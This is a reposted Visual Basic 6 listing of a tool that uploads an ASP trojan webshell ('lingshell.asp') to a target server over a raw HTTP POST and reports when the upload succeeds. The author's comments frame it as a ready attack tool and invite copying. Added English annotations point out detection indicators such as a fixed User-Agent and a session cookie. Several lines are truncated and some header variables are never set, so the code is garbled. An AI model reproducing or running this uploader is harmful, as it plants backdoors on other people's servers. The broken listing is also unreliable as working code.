
[转载] ASP木马后门提交工具全部核心VB代码

Private Sub Command1_Click()
    ' Begin a connection attempt to the endpoint typed into the form:
    ' Text3 supplies the port and Text2 the host, both used exactly as entered.
    With Winsock1
        .RemotePort = Text3.Text
        .RemoteHost = Text2.Text
        .Connect
    End With

    ' Disable the button while the attempt is pending, then arm Timer2,
    ' whose handler inspects whatever the server sent back.
    Command1.Enabled = False
    Me.Timer2.Enabled = True
End Sub

Private Sub Timer2_Timer()
    ' One-shot check: the timer is switched off on its first tick in both outcomes.
    Me.Timer2.Enabled = False

    ' The outcome is decided solely by a substring match for the file name in
    ' Text6 (the most recently received data); no HTTP status code is examined.
    ' The fixed name "lingshell.asp" is also a simple indicator to search for
    ' when auditing web roots and access logs.
    If InStr(Text6.Text, "lingshell.asp") = 0 Then
        MsgBox "上传失败!", , "警告"
    Else
        MsgBox "上传成功!! 木马已经上传到 http://" & Text2.Text & "" & Text4.Text & " 这个位置的目录下.WebShell文件为 lingshell.asp", , "恭喜"
    End If
End Sub

Private Sub winsock1_Connect()
' Runs when the Winsock1 connection is established. Builds the header block of
' a raw HTTP/1.1 POST request as one string and sends it over the socket.
' Text4 supplies the request path; Text2 supplies the host used in the
' Referer and Host headers.

' Define the request headers and the data to submit -- the core of the tool

Dim PostPOST
Dim PostAccept
Dim PostReferer
Dim PostAcceptLanguage
Dim PostContentType
Dim PostAcceptEncoding
Dim PostUserAgent
Dim PostHost
Dim PostContentLength
Dim PostConnection
Dim PostCacheControl
Dim PostCookie
Dim PostDATA
Dim TopPostDATA

PostPOST = "POST " & Text4.Text & " HTTP/1.1"
PostAccept = "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, application/x-shockwave-flash, */*"
PostReferer = "Referer: http://" & Text2.Text & "/"
PostAcceptLanguage = "Accept-Language: zh-cn"
' NOTE(review): the next line is truncated in this copy; the original
' statement cannot be recovered from the page.
PostC
PostAcceptEncoding = "Accept-Encoding: gzip, deflate"
' Static, tool-specific User-Agent: it pairs "MSIE 9.0" with "Windows NT 9.1"
' (not a released Windows version) and embeds "linghao" and
' "www.chinanethack.com". Because it never varies, it is a usable search term
' in web server logs. The literal is split across two lines in this copy.
PostUserAgent = "User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 9.1; linghao ;
www.chinanethack.com)"
PostHost = "Host: " & Text2.Text & ""
' NOTE(review): the next three lines are truncated in this copy as well.
PostC
PostC
PostCacheC
' Hard-coded ASP session cookie; the same value goes out on every request,
' which makes it a second stable indicator.
PostCookie = "Cookie: ASPSESSIONIDGGGGGSDQ=AMBLGJAACHFIJNEDMGGEHCHF"
' Request body is taken verbatim from Text1.
PostDATA = Text1.Text

' Join the header lines with CRLF.
' NOTE(review): PostContentType, PostContentLength, PostConnection and
' PostCacheControl are declared but never assigned in the visible lines, and
' the expression ends on a dangling line continuation, so the listing is
' incomplete as shown.
TopPostDATA = PostPOST _
& vbCrLf & PostAccept _
& vbCrLf & PostReferer _
& vbCrLf & PostAcceptLanguage _
& vbCrLf & PostContentType _
& vbCrLf & PostAcceptEncoding _
& vbCrLf & PostUserAgent _
& vbCrLf & PostHost _
& vbCrLf & PostContentLength _
& vbCrLf & PostConnection _
& vbCrLf & PostCacheControl _
& vbCrLf & PostCookie & vbCrLf _

Winsock1.SendData TopPostDATA

End Sub

Private Sub Command2_Click()
    ' Drop the current socket connection and re-enable the connect button
    ' so a new attempt can be started.
    Call Winsock1.Close
    Command1.Enabled = True
End Sub

Private Sub winsock1_DataArrival(ByVal bytesTotal As Long)
    ' Copy the newly arrived data into Text6, which Timer2_Timer later scans.
    ' Text6 is overwritten rather than appended to, so only the latest
    ' arrival is retained; bytesTotal is not used.
    Dim received As String

    Winsock1.GetData received
    Text6.Text = received
End Sub

Private Sub Form_Load()
' Shows the author's attribution notice in a message box when the form loads.
' NOTE(review): the string literal is split across two lines in this copy.
MsgBox "版权
www.chinanethack.com-零号所有 欢迎大家抄袭改进!"
End Sub

'这里要使用时间控件来判断,是因为返回有个时间间隔问题。而且如果你提交的字节数不规范,服务器有可能不响应你,所以用时间判断返回是比较合理的。代码写得不好,望见谅~ TopPostDATA = 你的木马 使用POST